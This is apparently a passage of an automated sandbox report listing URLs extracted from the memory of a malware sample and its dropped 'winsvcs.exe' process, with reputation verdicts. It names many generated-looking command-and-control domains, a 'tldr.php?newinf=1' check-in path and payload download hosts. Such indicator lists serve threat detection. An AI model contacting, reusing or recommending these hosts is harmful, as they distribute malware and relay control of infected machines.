                                                                                                                                                                                                    http://eiifngjfksisiufjf.com/LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://eoroooskfogihisrg.com/LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://fifiehsueuufidhfi.net/LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://slpsrgpsrhojifdij.com/tldr.php?newinf=1winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://nousiieiffgogogoo.info/LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://iuirshriuisruruuf.biz/tldr.php?newinf=1winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://eoroooskfogihisrg.com/tldr.php?newinf=1wwinsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://afeifieuuufufufuf.in/tldr.php?newinf=1winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://www.develop.comDeepakSciTE.exe.1.drfalse
                                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://afeifieuuufufufuf.su/tldr.php?newinf=1winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://ddos.dnsnb8.net:799/cj//k3.rarwXBVdJN.exe, 0000000A.00000002.2703021536.0000000000C56000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                    • Avira URL Cloud: phishing
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://iuirshriuisruruuf.com/LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://nousiieiffgogogoo.su/tldr.php?newinf=1ohwinsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://eofihsishihiursgu.ru/LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://eoroooskfogihisrg.info/LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://nnososoosjfeuhueu.net/tldr.php?newinf=1ewinsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://noeuaoenriusfiruu.in/LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://www.activestate.comSciTE.exe.1.drfalse
                                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://srndndubsbsifurfd.su/http://fiiauediehduefuge.su/http://nousiieiffgogogoo.su/http://fifiehsueLisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://fifiehsueuufidhfi.biz/tldr.php?newinf=1.mwinsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://slpsrgpsrhojifdij.biz/LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://srndndubsbsifurfd.biz/tldr.php?newinf=1Gj9winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://ssofhoseuegsgrfnj.com/LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://eiifngjfksisiufjf.in/LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://noeuaoenriusfiruu.com/tldr.php?newinf=1Lwinsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://nousiieiffgogogoo.ru/LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://afeifieuuufufufuf.in/LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://www.spaceblue.comMathiasSciTE.exe.1.drfalse
                                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://fuaiuebndieufeufu.in/tldr.php?newinf=1winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://iuirshriuisruruuf.ru/LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://eoroooskfogihisrg.net/tldr.php?newinf=1YAwinsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://fifiehsueuufidhfi.net/tldr.php?newinf=1winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://eofihsishihiursgu.com/tldr.php?newinf=1winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://eofihsishihiursgu.net/tldr.php?newinf=1wAwinsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://www.lua.orgSciTE.exe.1.drfalse
                                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://ddos.dnsnb8.net/XBVdJN.exe, 00000001.00000003.2333200622.00000000011B1000.00000004.00000020.00020000.00000000.sdmp, XBVdJN.exe, 00000001.00000002.2443353213.000000000119A000.00000004.00000020.00020000.00000000.sdmp, XBVdJN.exe, 0000000A.00000003.2549222413.0000000000C4F000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                    • URL Reputation: malware
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://aiiaiafrzrueuedur.in/LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://eofihsishihiursgu.net/tldr.php?newinf=1nwinsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://fiiauediehduefuge.com/tldr.php?newinf=1Ck%winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                    unknown
